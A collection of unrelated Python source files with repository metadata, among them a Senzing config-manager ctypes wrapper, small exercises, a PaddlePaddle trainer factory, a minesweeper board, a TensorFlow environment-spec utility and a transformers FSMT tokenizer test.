arcpy.AddMessage("ERROR: For more information see https://senzing.zendesk.com/hc/en-us/articles/115002408867-Introduction-G2-Quickstart")
arcpy.AddMessage("ERROR: If you are running Ubuntu or Debian please also review the ssl and crypto information at https://senzing.zendesk.com/hc/en-us/articles/115010259947-System-Requirements")
raise G2ModuleGenericException("Failed to load the G2 library")
self._resize_func_def = CFUNCTYPE(c_char_p, c_char_p, c_size_t)
self._resize_func = self._resize_func_def(resize_return_buffer)
def prepareStringArgument(self, stringToPrepare):
# type: (str) -> str
""" Internal processing function """
#handle null string
if stringToPrepare == None:
return None
#if string is unicode, transcode to utf-8 str
if type(stringToPrepare) == str:
return stringToPrepare.encode('utf-8')
#if input is bytearray, assumt utf-8 and convert to str
elif type(stringToPrepare) == bytearray:
return stringToPrepare.decode().encode('utf-8')
elif type(stringToPrepare) == bytes:
return str(stringToPrepare).encode('utf-8')
#input is already a str
return stringToPrepare
def prepareIntArgument(self, valueToPrepare):
# type: (str) -> int
""" Internal processing function """
""" This converts many types of values to an integer """
#handle null string
if valueToPrepare == None:
return None
#if string is unicode, transcode to utf-8 str
if type(valueToPrepare) == str:
return int(valueToPrepare.encode('utf-8'))
#if input is bytearray, assumt utf-8 and convert to str
elif type(valueToPrepare) == bytearray:
return int(valueToPrepare)
elif type(valueToPrepare) == bytes:
return int(valueToPrepare)
#input is already an int
return valueToPrepare
def addConfig(self, configStr, configComments, configID):
""" registers a new configuration document in the datastore
"""
_configStr = self.prepareStringArgument(configStr)
_configComments = self.prepareStringArgument(configComments)
configID[::]=b''
cID = c_longlong(0)
self._lib_handle.G2ConfigMgr_addConfig.argtypes = [c_char_p, c_char_p, POINTER(c_longlong)]
self._lib_handle.G2ConfigMgr_addConfig.restype = c_int
ret_code = self._lib_handle.G2ConfigMgr_addConfig(_configStr,_configComments,cID)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
configID += (str(cID.value).encode())
def getConfig(self,configID,response):
""" retrieves the registered configuration document from the datastore
"""
configID_ = self.prepareIntArgument(configID)
response[::]=b''
responseBuf = c_char_p(addressof(tls_var.buf))
responseSize = c_size_t(tls_var.bufSize)
self._lib_handle.G2ConfigMgr_getConfig.restype = c_int
self._lib_handle.G2ConfigMgr_getConfig.argtypes = [c_longlong, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2ConfigMgr_getConfig(configID_,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
#Add the bytes to the response bytearray from calling function
response += tls_var.buf.value
def getConfigList(self,response):
""" retrieves a list of known configurations from the datastore
"""
response[::]=b''
responseBuf = c_char_p(addressof(tls_var.buf))
responseSize = c_size_t(tls_var.bufSize)
self._lib_handle.G2ConfigMgr_getConfigList.restype = c_int
self._lib_handle.G2ConfigMgr_getConfigList.argtypes = [POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2ConfigMgr_getConfigList(
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
#Add the bytes to the response bytearray from calling function
response += tls_var.buf.value
def setDefaultConfigID(self,configID):
""" sets the default config identifier in the datastore
"""
configID_ = self.prepareIntArgument(configID)
self._lib_handle.G2ConfigMgr_setDefaultConfigID.restype = c_int
self._lib_handle.G2ConfigMgr_setDefaultConfigID.argtypes = [c_longlong]
ret_code = self._lib_handle.G2ConfigMgr_setDefaultConfigID(configID_)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def replaceDefaultConfigID(self,oldConfigID,newConfigID):
""" sets the default config identifier in the datastore
"""
oldConfigID_ = self.prepareIntArgument(oldConfigID)
newConfigID_ = self.prepareIntArgument(newConfigID)
self._lib_handle.G2ConfigMgr_replaceDefaultConfigID.restype = c_int
self._lib_handle.G2ConfigMgr_replaceDefaultConfigID.argtypes = [c_longlong,c_longlong]
ret_code = self._lib_handle.G2ConfigMgr_replaceDefaultConfigID(oldConfigID_,newConfigID_)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def getDefaultConfigID(self, configID):
""" gets the default config identifier from the datastore
"""
configID[::]=b''
cID = c_longlong(0)
self._lib_handle.G2ConfigMgr_getDefaultConfigID.argtypes = [POINTER(c_longlong)]
self._lib_handle.G2ConfigMgr_getDefaultConfigID.restype = c_int
ret_code = self._lib_handle.G2ConfigMgr_getDefaultConfigID(cID)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
if cID.value:
configID += (str(cID.value).encode())
def clearLastException(self):
""" Clears the last exception
"""
self._lib_handle.G2ConfigMgr_clearLastException.restype = None
self._lib_handle.G2ConfigMgr_clearLastException.argtypes = []
self._lib_handle.G2ConfigMgr_clearLastException()
def getLastException(self):
""" Gets the last exception
"""
self._lib_handle.G2ConfigMgr_getLastException.restype = c_int
self._lib_handle.G2ConfigMgr_getLastException.argtypes = [c_char_p, c_size_t]
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf,sizeof(tls_var.buf))
resultString = tls_var.buf.value.decode('utf-8')
return resultString
def getLastExceptionCode(self):
""" Gets the last exception code
"""
self._lib_handle.G2ConfigMgr_getLastExceptionCode.restype = c_int
self._lib_handle.G2ConfigMgr_getLastExceptionCode.argtypes = []
exception_code = self._lib_handle.G2ConfigMgr_getLastExceptionCode()
return exception_code
def destroy(self):
""" Uninitializes the engine
This should be done once per process after init(...) is called.
After it is called the engine will no longer function.
Args:
Return:
None
"""
self._lib_handle.G2ConfigMgr_destroy()
| 43.196552 | 204 | 0.662808 | [
"MIT"
] | GeoJamesJones/ArcGIS-Senzing-Prototype | senzing/g2/sdk/python/G2ConfigMgr.py | 12,527 | Python |
start_num = int(input())
end_num = int(input())
prime_nums = []
for num in range(start_num, end_num + 1):
if num > 1:
for i in range(2, num//2+1):
if num % i == 0:
break
else:
prime_nums.append(num)
print(' '.join(map(str, prime_nums)) + ' ')
print(f'The total number of prime numbers between {start_num} to {end_num} is {len(prime_nums)}')
| 22.555556 | 97 | 0.564039 | [
"MIT"
] | elenaborisova/Softuniada-Competition | softuniada_2021/01_easter_prize.py | 406 | Python |
class Node:
""" A singly-linked node. """
def __init__(self, data=None):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__ (self):
self.tail = None
self.head = None
def append(self, data):
node = Node(data)
if self.head:
self.head.next = node
self.head = node
else:
self.tail = node
self.head = node
words = SinglyLinkedList()
words.append('egg')
words.append('ham')
words.append('spam')
current = words.tail
while current:
print(current.data)
current = current.next
| 20.375 | 34 | 0.542945 | [
"MIT"
] | PacktPublishing/Data-Structures-and-Algorithms-with-Python-Third-Edition | Chapter04/faster_append_singly_linked_list.py | 652 | Python |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
from paddle.fluid.log_helper import get_logger
local_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer, HeterXpuTrainer, PSGPUTrainer
from .device_worker import Hogwild, DownpourSGD, Section, DownpourSGDOPT
from .framework import Variable
from multiprocessing import Process, Manager
__all__ = ["TrainerFactory", "FetchHandlerMonitor"]
class TrainerFactory(object):
"""
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
"""
def __init__(self):
pass
def _create_trainer(self, opt_info=None):
trainer = None
device_worker = None
if not opt_info:
# default is MultiTrainer + Hogwild
trainer = MultiTrainer()
device_worker = Hogwild()
trainer._set_device_worker(device_worker)
else:
trainer_class = opt_info.get("trainer", "MultiTrainer")
device_worker_class = opt_info.get("device_worker", "Hogwild")
trainer = globals()[trainer_class]()
device_worker = globals()[device_worker_class]()
# for debug tools
if opt_info is not None:
if opt_info.get("dump_slot") is not None:
trainer._set_dump_slot(opt_info["dump_slot"])
if opt_info.get("mpi_rank") is not None:
trainer._set_mpi_rank(opt_info["mpi_rank"])
if opt_info.get("mpi_size") is not None:
trainer._set_mpi_size(opt_info["mpi_size"])
if opt_info.get("dump_fields") is not None and len(
opt_info.get("dump_fields")) != 0:
trainer._set_dump_fields(opt_info["dump_fields"])
if opt_info.get("dump_fields_path") is not None and len(
opt_info.get("dump_fields_path")) != 0:
trainer._set_dump_fields_path(opt_info["dump_fields_path"])
if opt_info.get("dump_file_num") is not None:
trainer._set_dump_file_num(opt_info["dump_file_num"])
if opt_info.get("dump_converter") is not None:
trainer._set_dump_converter(opt_info["dump_converter"])
if opt_info.get("dump_param") is not None and len(
opt_info.get("dump_param")) != 0:
trainer._set_dump_param(opt_info["dump_param"])
if opt_info.get("worker_places") is not None:
trainer._set_worker_places(opt_info["worker_places"])
if opt_info.get("use_ps_gpu") is not None:
trainer._set_use_ps_gpu(opt_info["use_ps_gpu"])
if opt_info.get("enable_random_dump") is not None:
trainer._set_enable_random_dump(opt_info[
"enable_random_dump"])
if opt_info.get("dump_interval") is not None:
trainer._set_dump_interval(opt_info["dump_interval"])
if opt_info.get("random_with_lineid") is not None:
trainer._set_random_with_lineid(opt_info[
"random_with_lineid"])
if "fleet_desc" in opt_info:
device_worker._set_fleet_desc(opt_info["fleet_desc"])
trainer._set_fleet_desc(opt_info["fleet_desc"])
if opt_info.get("use_cvm") is not None:
trainer._set_use_cvm(opt_info["use_cvm"])
if opt_info.get("no_cvm") is not None:
trainer._set_no_cvm(opt_info["no_cvm"])
if opt_info.get("scale_datanorm") is not None:
trainer._set_scale_datanorm(opt_info["scale_datanorm"])
if opt_info.get("adjust_ins_weight") is not None:
trainer._set_adjust_ins_weight(opt_info[
"adjust_ins_weight"])
if opt_info.get("copy_table") is not None:
trainer._set_copy_table_config(opt_info["copy_table"])
if opt_info.get("check_nan_var_names") is not None:
trainer._set_check_nan_var_names(opt_info[
"check_nan_var_names"])
if opt_info.get("loss_names") is not None:
trainer._set_loss_names(opt_info["loss_names"])
trainer._set_device_worker(device_worker)
return trainer
class FetchHandlerMonitor(object):
"""
Defination of FetchHandlerMonitor class,
it's for fetch handler.
"""
def __init__(self, scope, handler):
self.fetch_instance = handler
self.fetch_thread = threading.Thread(
target=self.handler_launch_func, args=(scope, self.fetch_instance))
self.running_lock = threading.Lock()
self.running = False
def handler_launch_func(self, scope, handler):
fetch_instance = handler
period_secs = fetch_instance.period_secs
var_name_to_key = {}
for key in fetch_instance.var_dict:
if isinstance(fetch_instance.var_dict[key], Variable):
var_name_to_key[fetch_instance.var_dict[key].name] = key
else:
local_logger.warning("the value of {} is not a Variable".format(
key))
var_name_to_key["None.var"] = key
elapsed_secs = 0
while True:
self.running_lock.acquire()
if self.running == False:
break
if elapsed_secs < period_secs:
# TODO(guru4elephant): needs customized condition
time.sleep(1)
elapsed_secs += 1
else:
elapsed_secs = 0
fetch_dict = {}
for key in var_name_to_key:
var = scope.find_var(key)
fetch_dict[key] = var
if var == None:
local_logger.warning("{} value currently not available".
format(var_name_to_key[key]))
res_dict = {}
for key in fetch_dict:
user_name = var_name_to_key[key]
if fetch_dict[key] == None:
res_dict[user_name] = None
continue
else:
res_dict[user_name] = fetch_dict[key].get_tensor()
lod = res_dict[user_name].lod()
if len(lod) > 0:
raise RuntimeError("Some of your fetched tensors \
hold LoD information. \
They can not be completely cast \
to Python ndarray. We can \
not return LoDTensor itself directly, \
please choose another targets")
if res_dict[user_name]._is_initialized():
res_dict[user_name] = np.array(res_dict[user_name])
else:
res_dict[user_name] = None
fetch_instance.handler(res_dict)
self.running_lock.release()
def start(self):
"""
start monitor,
it will start a monitor thread.
"""
self.running_lock.acquire()
self.running = True
self.running_lock.release()
self.fetch_thread.setDaemon(True)
self.fetch_thread.start()
def stop(self):
self.running_lock.acquire()
self.running = False
self.running_lock.release()
| 43.789744 | 104 | 0.574072 | [
"Apache-2.0"
] | 0x45f/Paddle | python/paddle/fluid/trainer_factory.py | 8,539 | Python |
# https://en.m.wikipedia.org/wiki/Box_Drawing
from random import randrange
class Board:
# you only need to use update_board() outside this class.
def __init__(self, size, mine_numbers):
self.size = size
self.default_content = " ◌ "
self.board_data = self.create_board(self.size)
self.mine_numbers = mine_numbers
def create_board(self, size):
return [[self.default_content for x in range(self.size)] for y in range(self.size)]
def internal_board(self):
internal_board = ""
for x in range(len(self.board_data)):
drawn_line = ""
for y in range(len(self.board_data)):
drawn_line += self.board_data[x][y]
if y != len(self.board_data) - 1:
drawn_line += "│"
internal_board += drawn_line + "\n"
if x < len(self.board_data) - 1:
internal_board += "───┼" * \
(len(self.board_data) - 1) + "───" + "\n"
return internal_board
def draw_board(self):
internal_board = self.internal_board()
drawn_board = ""
# drawing the boarder around the internal board
internal_board = internal_board.split("\n")
drawn_board += "╔═══" + "╤═══" * (self.size - 1) + "╗" + "\n"
for x in range(0, self.size * 2, 2):
drawn_board += "║" + \
internal_board[x] + "║" + f" :{int(x/2 +1)}" + "\n"
if x != (self.size * 2) - 2:
drawn_board += "╟" + internal_board[x + 1] + "╢" + "\n"
drawn_board += "╚═══" + "╧═══" * (self.size - 1) + "╝" + "\n"
for x in range(self.size):
number = x + 1
if number < 10:
drawn_board += f" {number} "
else:
drawn_board += f" {number}"
return drawn_board
def generate_mines(self):
mine_list = []
while len(mine_list) < self.mine_numbers:
x = randrange(self.size)
y = randrange(self.size)
if (x, y) not in mine_list:
mine_list.append((x, y))
return mine_list
def generate_mine_board(self):
mine_list = self.generate_mines()
mine_board = ([[0 for y in range(self.size)] for x in range(self.size)])
for mine in mine_list:
#add a mine to the mine position, and add 1 to all adjecent spots
x = mine[0]
y = mine[1]
mine_board[y][x] = "◉" # negative = mine
for x_ in range(x - 1, x + 2):
for y_ in range(y - 1, y + 2):
if 0 <= x_ < self.size and 0 <= y_ < self.size and mine_board[y_][x_] != "◉":
mine_board[y_][x_] += 1
return mine_board
def find_valid_starting_mine_board(self, x, y):
#making shure the first x,y input fits
mine_board_candidate = []
while True:
mine_board_candidate = self.generate_mine_board()
if mine_board_candidate[y - 1][x - 1] == 0:
print(mine_board_candidate)
break
self.mine_board = mine_board_candidate
def flood_fill(self, x, y):
if self.board_data[y][x] == " ◌ " and self.mine_board[y][x] == "◉":
raise Exception("the flood fill algo hit a mine, but it shouldn't because it will stop when it hits a number.")
elif self.board_data[y][x] == " ◌ " and self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
elif self.board_data[y][x] == " ◌ " and self.mine_board[y][x] == 0:
self.board_data[y][x] = " "
for x_ in range(x - 1, x + 2):
for y_ in range(y - 1, y + 2):
if 0 <= x_ < self.size and 0 <= y_ < self.size:
self.flood_fill(x_, y_)
def reveal_board(self):
for x in range(self.size):
for y in range(self.size):
if self.board_data[y][x] in [" ◌ ", " ▶ "]:
if self.mine_board[y][x] == "◉":
self.board_data[y][x] = " ◉ "
elif self.mine_board[y][x] == 0:
self.board_data[y][x] = " "
elif self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
return self.draw_board()
def check_winning(self):
flag = True
for x in range(self.size):
for y in range(self.size):
if self.board_data[y][x] == " ◌ " and self.mine_board[y][x] != "◉":
flag = False
return flag
def update_board(self, position, flag=False):
"""Takes position [x,y] as input
returns a updated board as a string
"""
x = position[0] - 1
y = position[1] - 1
if flag == True:
if self.board_data[y][x] == " ◌ ":
self.board_data[y][x] = " ▶ "
elif self.board_data[y][x] == " ▶ ":
self.board_data[y][x] = " ◌ "
return self.draw_board()
if self.mine_board[y][x] == "◉":
self.board_data[y][x] = " ◉ "
return False
elif isinstance(self.mine_board[y][x], int) and self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
else:
self.flood_fill(x, y)
return self.draw_board()
| 29.625 | 114 | 0.604486 | [
"MIT"
] | Epirius/minesweeper | board.py | 4,601 | Python |
import iris
from iris.experimental.ugrid import PARSE_UGRID_ON_LOAD
import geovista as gv
fname = "./qrclim.sst.ugrid.nc"
with PARSE_UGRID_ON_LOAD.context():
cube = iris.load_cube(fname)[0]
face_node = cube.mesh.face_node_connectivity
indices = face_node.indices_by_location()
lons, lats = cube.mesh.node_coords
mesh = gv.Transform.from_unstructured(
lons.points,
lats.points,
indices,
data=cube.data,
start_index=face_node.start_index,
name=cube.name(),
)
plotter = gv.GeoPlotter()
sargs = dict(title=f"{cube.name()} / {cube.units}")
plotter.add_mesh(mesh, cmap="balance", show_edges=False, scalar_bar_args=sargs)
plotter.add_coastlines(resolution="10m", color="white")
plotter.add_axes()
plotter.add_text(
"Unstructured Cube-Sphere Face Data (N, 4)",
position="upper_left",
font_size=10,
shadow=True,
)
plotter.show()
| 24.828571 | 79 | 0.735328 | [
"BSD-3-Clause"
] | trexfeathers/geovista | examples/example_from_unstructured__lfric.py | 869 | Python |
"""Post gen hook to ensure that the generated project
has only one package management, either pipenv or pip."""
import logging
import os
import shutil
import sys
_logger = logging.getLogger()
def clean_extra_package_management_files():
"""Removes either requirements files and folder or the Pipfile."""
use_pipenv = "{{cookiecutter.use_pipenv}}"
use_heroku = "{{cookiecutter.use_heroku}}"
to_delete = []
if use_pipenv == "yes":
to_delete = to_delete + ["requirements.txt", "requirements"]
else:
to_delete.append("Pipfile")
if use_heroku == "no":
to_delete = to_delete + ["Procfile", "app.json"]
try:
for file_or_dir in to_delete:
if os.path.isfile(file_or_dir):
os.remove(file_or_dir)
else:
shutil.rmtree(file_or_dir)
shutil.copy(".env.example", ".env")
open("dev.db", 'a').close()
except OSError as e:
_logger.warning("While attempting to remove file(s) an error occurred")
_logger.warning(f"Error: {e}")
sys.exit(1)
if __name__ == "__main__":
clean_extra_package_management_files()
| 28.292683 | 79 | 0.637931 | [
"MIT"
] | HaeckelK/cookiecutter-flask | hooks/post_gen_project.py | 1,160 | Python |
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for environment interface with agent / tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange
class spaces(object):
discrete = 0
box = 1
def get_space(space):
if hasattr(space, 'n'):
return space.n, spaces.discrete, None
elif hasattr(space, 'shape'):
return np.prod(space.shape), spaces.box, (space.low, space.high)
def get_spaces(spaces):
if hasattr(spaces, 'spaces'):
return zip(*[get_space(space) for space in spaces.spaces])
else:
return [(ret,) for ret in get_space(spaces)]
class EnvSpec(object):
def __init__(self, env, try_combining_actions=True,
discretize_actions=None):
self.discretize_actions = discretize_actions
# figure out observation space
self.obs_space = env.observation_space
self.obs_dims, self.obs_types, self.obs_info = get_spaces(self.obs_space)
# figure out action space
self.act_space = env.action_space
self.act_dims, self.act_types, self.act_info = get_spaces(self.act_space)
if self.discretize_actions:
self._act_dims = self.act_dims[:]
self._act_types = self.act_types[:]
self.act_dims = []
self.act_types = []
for i, (dim, typ) in enumerate(zip(self._act_dims, self._act_types)):
if typ == spaces.discrete:
self.act_dims.append(dim)
self.act_types.append(spaces.discrete)
elif typ == spaces.box:
for _ in xrange(dim):
self.act_dims.append(self.discretize_actions)
self.act_types.append(spaces.discrete)
else:
self._act_dims = None
self._act_types = None
if (try_combining_actions and
all(typ == spaces.discrete for typ in self.act_types)):
self.combine_actions = True
self.orig_act_dims = self.act_dims[:]
self.orig_act_types = self.act_types[:]
total_act_dim = 1
for dim in self.act_dims:
total_act_dim *= dim
self.act_dims = [total_act_dim]
self.act_types = [spaces.discrete]
else:
self.combine_actions = False
self.obs_dims_and_types = list(zip(self.obs_dims, self.obs_types))
self.act_dims_and_types = list(zip(self.act_dims, self.act_types))
self.total_obs_dim = sum(self.obs_dims)
self.total_sampling_act_dim = sum(self.sampling_dim(dim, typ)
for dim, typ in self.act_dims_and_types)
self.total_sampled_act_dim = sum(self.act_dims)
def sampling_dim(self, dim, typ):
if typ == spaces.discrete:
return dim
elif typ == spaces.box:
return 2 * dim # Gaussian mean and std
else:
assert False
def convert_actions_to_env(self, actions):
if self.combine_actions:
new_actions = []
actions = actions[0]
for dim in self.orig_act_dims:
new_actions.append(np.mod(actions, dim))
actions = (actions / dim).astype('int32')
actions = new_actions
if self.discretize_actions:
new_actions = []
idx = 0
for i, (dim, typ) in enumerate(zip(self._act_dims, self._act_types)):
if typ == spaces.discrete:
new_actions.append(actions[idx])
idx += 1
elif typ == spaces.box:
low, high = self.act_info[i]
cur_action = []
for j in xrange(dim):
cur_action.append(
low[j] + (high[j] - low[j]) * actions[idx] /
float(self.discretize_actions))
idx += 1
new_actions.append(np.hstack(cur_action))
actions = new_actions
return actions
def convert_env_actions_to_actions(self, actions):
if not self.combine_actions:
return actions
new_actions = 0
base = 1
for act, dim in zip(actions, self.orig_act_dims):
new_actions = new_actions + base * act
base *= dim
return [new_actions]
def convert_obs_to_list(self, obs):
if len(self.obs_dims) == 1:
return [obs]
else:
return list(obs)
def convert_action_to_gym(self, action):
if len(action) == 1:
return action[0]
else:
return list(action)
if ((not self.combine_actions or len(self.orig_act_dims) == 1) and
(len(self.act_dims) == 1 or
(self.discretize_actions and len(self._act_dims) == 1))):
return action[0]
else:
return list(action)
def initial_obs(self, batch_size):
batched = batch_size is not None
batch_size = batch_size or 1
obs = []
for dim, typ in self.obs_dims_and_types:
if typ == spaces.discrete:
obs.append(np.zeros(batch_size))
elif typ == spaces.box:
obs.append(np.zeros([batch_size, dim]))
if batched:
return obs
else:
return zip(*obs)[0]
def initial_act(self, batch_size=None):
batched = batch_size is not None
batch_size = batch_size or 1
act = []
for dim, typ in self.act_dims_and_types:
if typ == spaces.discrete:
act.append(-np.ones(batch_size))
elif typ == spaces.box:
act.append(-np.ones([batch_size, dim]))
if batched:
return act
else:
return zip(*act)[0]
def is_discrete(self, typ):
return typ == spaces.discrete
def is_box(self, typ):
return typ == spaces.box
| 30.045 | 80 | 0.6442 | [
"Apache-2.0"
] | azhou42/tensorflow-models-private | research/pcl_rl/env_spec.py | 6,009 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-06-10 08:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data_exchange', '0004_auto_20180610_0833'),
]
operations = [
migrations.AlterField(
model_name='ontaskworkflow',
name='url',
field=models.URLField(blank=True, max_length=2048, null=True),
),
migrations.AlterField(
model_name='qualtricssurvey',
name='url',
field=models.URLField(blank=True, max_length=2048, null=True),
),
]
| 25.730769 | 74 | 0.61136 | [
"MIT"
] | Ikochoy/mooclet-engine | mooclet_engine/data_exchange/migrations/0005_auto_20180610_0835.py | 669 | Python |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings.dev")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.4375 | 73 | 0.684112 | [
"Apache-2.0"
] | vtalks/vtalks.net | web/manage.py | 535 | Python |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import unittest
from transformers.file_utils import cached_property
from transformers.testing_utils import slow
from transformers.tokenization_fsmt import VOCAB_FILES_NAMES, FSMTTokenizer
from .test_tokenization_common import TokenizerTesterMixin
# using a different tiny model than the one used for default params defined in init to ensure proper testing
FSMT_TINY2 = "stas/tiny-wmt19-en-ru"
class FSMTTokenizationTest(TokenizerTesterMixin, unittest.TestCase):
tokenizer_class = FSMTTokenizer
def setUp(self):
super().setUp()
# Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt
vocab = [
"l",
"o",
"w",
"e",
"r",
"s",
"t",
"i",
"d",
"n",
"w</w>",
"r</w>",
"t</w>",
"lo",
"low",
"er</w>",
"low</w>",
"lowest</w>",
"newer</w>",
"wider</w>",
"<unk>",
]
vocab_tokens = dict(zip(vocab, range(len(vocab))))
merges = ["l o 123", "lo w 1456", "e r</w> 1789", ""]
self.langs = ["en", "ru"]
config = {
"langs": self.langs,
"src_vocab_size": 10,
"tgt_vocab_size": 20,
}
self.src_vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["src_vocab_file"])
self.tgt_vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["tgt_vocab_file"])
config_file = os.path.join(self.tmpdirname, "tokenizer_config.json")
self.merges_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["merges_file"])
with open(self.src_vocab_file, "w") as fp:
fp.write(json.dumps(vocab_tokens))
with open(self.tgt_vocab_file, "w") as fp:
fp.write(json.dumps(vocab_tokens))
with open(self.merges_file, "w") as fp:
fp.write("\n".join(merges))
with open(config_file, "w") as fp:
fp.write(json.dumps(config))
@cached_property
def tokenizer_ru_en(self):
return FSMTTokenizer.from_pretrained("facebook/wmt19-ru-en")
@cached_property
def tokenizer_en_ru(self):
return FSMTTokenizer.from_pretrained("facebook/wmt19-en-ru")
def test_online_tokenizer_config(self):
"""this just tests that the online tokenizer files get correctly fetched and
loaded via its tokenizer_config.json and it's not slow so it's run by normal CI
"""
tokenizer = FSMTTokenizer.from_pretrained(FSMT_TINY2)
self.assertListEqual([tokenizer.src_lang, tokenizer.tgt_lang], ["en", "ru"])
self.assertEqual(tokenizer.src_vocab_size, 21)
self.assertEqual(tokenizer.tgt_vocab_size, 21)
def test_full_tokenizer(self):
""" Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt """
tokenizer = FSMTTokenizer(self.langs, self.src_vocab_file, self.tgt_vocab_file, self.merges_file)
text = "lower"
bpe_tokens = ["low", "er</w>"]
tokens = tokenizer.tokenize(text)
self.assertListEqual(tokens, bpe_tokens)
input_tokens = tokens + ["<unk>"]
input_bpe_tokens = [14, 15, 20]
self.assertListEqual(tokenizer.convert_tokens_to_ids(input_tokens), input_bpe_tokens)
@slow
def test_sequence_builders(self):
tokenizer = self.tokenizer_ru_en
text = tokenizer.encode("sequence builders", add_special_tokens=False)
text_2 = tokenizer.encode("multi-sequence build", add_special_tokens=False)
encoded_sentence = tokenizer.build_inputs_with_special_tokens(text)
encoded_pair = tokenizer.build_inputs_with_special_tokens(text, text_2)
assert encoded_sentence == text + [2]
assert encoded_pair == text + [2] + text_2 + [2]
@slow
def test_match_encode_decode(self):
tokenizer_enc = self.tokenizer_en_ru
tokenizer_dec = self.tokenizer_ru_en
targets = [
[
"Here's a little song I wrote. Don't worry, be happy.",
[2470, 39, 11, 2349, 7222, 70, 5979, 7, 8450, 1050, 13160, 5, 26, 6445, 7, 2],
],
["This is it. No more. I'm done!", [132, 21, 37, 7, 1434, 86, 7, 70, 6476, 1305, 427, 2]],
]
# if data needs to be recreated or added, run:
# import torch
# model = torch.hub.load("pytorch/fairseq", "transformer.wmt19.en-ru", checkpoint_file="model4.pt", tokenizer="moses", bpe="fastbpe")
# for src_text, _ in targets: print(f"""[\n"{src_text}",\n {model.encode(src_text).tolist()}\n],""")
for src_text, tgt_input_ids in targets:
encoded_ids = tokenizer_enc.encode(src_text, return_tensors=None)
self.assertListEqual(encoded_ids, tgt_input_ids)
# and decode backward, using the reversed languages model
decoded_text = tokenizer_dec.decode(encoded_ids, skip_special_tokens=True)
self.assertEqual(decoded_text, src_text)
@slow
def test_tokenizer_lower(self):
tokenizer = FSMTTokenizer.from_pretrained("facebook/wmt19-ru-en", do_lower_case=True)
